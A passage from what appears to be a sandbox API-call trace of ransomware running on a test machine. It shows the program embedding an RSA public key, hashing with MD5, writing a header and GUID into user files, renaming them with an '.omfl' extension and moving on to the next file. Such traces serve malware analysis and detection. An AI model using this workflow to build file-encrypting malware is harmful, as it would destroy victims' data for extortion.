KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.461] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3198) returned 1 [0130.462] CryptCreateHash (in: hProv=0x49d3198, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0130.462] CryptHashData (hHash=0xdce3a70, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0130.462] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0130.462] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0130.462] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0130.462] GetLastError () returned 0x0 [0130.462] CryptDestroyHash (hHash=0xdce3a70) returned 1 [0130.462] CryptReleaseContext (hProv=0x49d3198, dwFlags=0x0) returned 1 [0130.462] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0130.462] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0130.462] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0130.462] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0130.462] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0130.462] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0130.462] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0130.462] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x9ef0) returned 0xdd2c688 [0130.463] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0130.463] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0130.463] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0xdd0bd00 [0130.463] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0130.463] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0x74e4b90 [0130.463] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08de8 [0130.463] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2ed8 [0130.463] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16b78 [0130.463] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2f20 [0130.463] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16b90 [0130.463] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16bc0 [0130.463] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16848 [0130.463] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16bd8 [0130.463] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x24) returned 0xdd0d930 [0130.463] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x158) returned 0xdcfae58 [0130.463] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdcfae58, Size=0x218) returned 0xdce0a50 [0130.463] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0130.463] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16bc0 | out: hHeap=0x4970000) returned 1 [0130.463] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16bd8 | out: hHeap=0x4970000) returned 1 [0130.463] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16848 | out: hHeap=0x4970000) returned 1 [0130.463] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0d930 | out: hHeap=0x4970000) returned 1 [0130.463] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0130.463] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16848 [0130.464] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e38 [0130.464] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16bd8 [0130.464] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cf068 [0130.464] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x9) returned 0xdd16bc0 [0130.464] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e78 [0130.464] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10e) returned 0x74e3210 [0130.464] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9278 [0130.464] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08cc8 [0130.464] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdf28 [0130.464] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x104) returned 0x7503670 [0130.464] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdb88 [0130.464] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0130.464] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0130.464] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16bd8 | out: hHeap=0x4970000) returned 1 [0130.464] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0130.464] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16bc0 | out: hHeap=0x4970000) returned 1 [0130.464] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf068 | out: hHeap=0x4970000) returned 1 [0130.464] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0130.464] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16848 | out: hHeap=0x4970000) returned 1 [0130.464] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9278 | out: hHeap=0x4970000) returned 1 [0130.464] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08de8 | out: hHeap=0x4970000) returned 1 [0130.464] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce0a50 | out: hHeap=0x4970000) returned 1 [0130.464] GetCurrentThreadId () returned 0x618 [0130.464] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24260 [0130.464] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x82) returned 0x49d5aa0 [0130.464] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2c) returned 0x750cb28 [0130.464] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3198 [0130.464] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x148) returned 0xdd17560 [0130.464] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0130.464] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0130.465] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24368 [0130.465] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.465] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.465] GetCurrentThreadId () returned 0x618 [0130.465] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.465] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.465] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xeb) returned 0x74e3210 [0130.465] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.465] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.465] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.465] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.465] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0130.465] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24578 [0130.465] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0130.465] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4c) returned 0x757c9b0 [0130.465] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0130.465] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24680 [0130.465] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0130.465] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16848 [0130.465] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.465] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0130.465] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8e0 [0130.465] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa890 [0130.465] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8c0 [0130.465] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8a0 [0130.465] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa860 [0130.465] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8b0 [0130.465] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16bc0 [0130.465] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8e0 | out: hHeap=0x4970000) returned 1 [0130.466] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa8e0 [0130.466] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.466] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0130.466] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa900 [0130.466] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8d0 [0130.466] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8f0 [0130.466] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16bd8 [0130.466] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8d0 | out: hHeap=0x4970000) returned 1 [0130.466] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cf068 [0130.466] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa900 | out: hHeap=0x4970000) returned 1 [0130.466] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16ba8 [0130.466] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8f0 | out: hHeap=0x4970000) returned 1 [0130.466] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16968 [0130.466] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.466] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e98 [0130.466] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa860 | out: hHeap=0x4970000) returned 1 [0130.466] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16a40 [0130.466] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.466] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd167e8 [0130.466] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa890 | out: hHeap=0x4970000) returned 1 [0130.466] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16bf0 [0130.466] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a40 | out: hHeap=0x4970000) returned 1 [0130.466] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16a40 [0130.466] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd167e8 | out: hHeap=0x4970000) returned 1 [0130.466] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa890 [0130.466] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0130.466] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf128 [0130.466] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa890 | out: hHeap=0x4970000) returned 1 [0130.466] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1c) returned 0xdce9278 [0130.466] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16bc0 | out: hHeap=0x4970000) returned 1 [0130.467] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16bc0 [0130.467] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8e0 | out: hHeap=0x4970000) returned 1 [0130.467] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x204) returned 0xdd20488 [0130.467] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16848 | out: hHeap=0x4970000) returned 1 [0130.467] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x7503788 [0130.467] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a40 | out: hHeap=0x4970000) returned 1 [0130.467] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x210) returned 0xdce0a50 [0130.467] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9278 | out: hHeap=0x4970000) returned 1 [0130.467] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10c) returned 0x74e3210 [0130.467] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8c0 | out: hHeap=0x4970000) returned 1 [0130.467] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x75038a0 [0130.467] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16bc0 | out: hHeap=0x4970000) returned 1 [0130.467] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x200) returned 0xdcfc0b8 [0130.467] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503788 | out: hHeap=0x4970000) returned 1 [0130.467] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24788 [0130.467] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0130.467] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3198 | out: hHeap=0x4970000) returned 1 [0130.467] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24578 | out: hHeap=0x4970000) returned 1 [0130.467] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24788 | out: hHeap=0x4970000) returned 1 [0130.467] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf128 | out: hHeap=0x4970000) returned 1 [0130.467] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x75038a0 | out: hHeap=0x4970000) returned 1 [0130.468] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce0a50 | out: hHeap=0x4970000) returned 1 [0130.468] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfc0b8 | out: hHeap=0x4970000) returned 1 [0130.468] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0130.468] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8a0 | out: hHeap=0x4970000) returned 1 [0130.468] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16bf0 | out: hHeap=0x4970000) returned 1 [0130.468] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8b0 | out: hHeap=0x4970000) returned 1 [0130.468] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0130.468] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf068 | out: hHeap=0x4970000) returned 1 [0130.468] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16bd8 | out: hHeap=0x4970000) returned 1 [0130.468] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16ba8 | out: hHeap=0x4970000) returned 1 [0130.468] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17560 | out: hHeap=0x4970000) returned 1 [0130.468] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb28 | out: hHeap=0x4970000) returned 1 [0130.468] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24368 | out: hHeap=0x4970000) returned 1 [0130.468] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16b90 | out: hHeap=0x4970000) returned 1 [0130.468] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2f20 | out: hHeap=0x4970000) returned 1 [0130.468] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd20488 | out: hHeap=0x4970000) returned 1 [0130.469] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x9eee, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.469] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0130.469] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0130.469] WriteFile (in: hFile=0x5c8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0130.469] CloseHandle (hObject=0x5c8) returned 1 [0130.471] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3198 [0130.471] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x890) returned 0x7516fe8 [0130.471] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fy7wR6_Uk9zi rXA1gQ.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fy7wr6_uk9zi rxa1gq.doc"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fy7wR6_Uk9zi rXA1gQ.doc.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fy7wr6_uk9zi rxa1gq.doc.omfl")) returned 1 [0130.473] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3a7574b0, ftCreationTime.dwHighDateTime=0x1d5e096, ftLastAccessTime.dwLowDateTime=0x3c718c00, ftLastAccessTime.dwHighDateTime=0x1d5dc26, ftLastWriteTime.dwLowDateTime=0x3c718c00, ftLastWriteTime.dwHighDateTime=0x1d5dc26, nFileSizeHigh=0x0, nFileSizeLow=0x39aa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="glPN 8bwPmLEByy5eC8l.m4a", cAlternateFileName="GLPN8B~1.M4A")) returned 1 [0130.473] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.473] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3088 [0130.473] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\glPN 8bwPmLEByy5eC8l.m4a") returned=".m4a" [0130.473] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\glPN 8bwPmLEByy5eC8l.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\glpn 8bwpmlebyy5ec8l.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0130.473] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=14762) returned 1 [0130.473] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0130.476] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x3984, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.476] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0130.477] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0130.478] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x39aa, lpOverlapped=0x0) returned 1 [0130.478] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.478] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0130.478] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.478] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.478] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3198) returned 1 [0130.479] CryptCreateHash (in: hProv=0x49d3198, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0130.479] CryptHashData (hHash=0xdce3a70, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0130.479] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0130.479] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0130.479] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0130.479] GetLastError () returned 0x0 [0130.479] CryptDestroyHash (hHash=0xdce3a70) returned 1 [0130.479] CryptReleaseContext (hProv=0x49d3198, dwFlags=0x0) returned 1 [0130.479] UuidCreate (in: Uuid=0xe00fa48 | out: 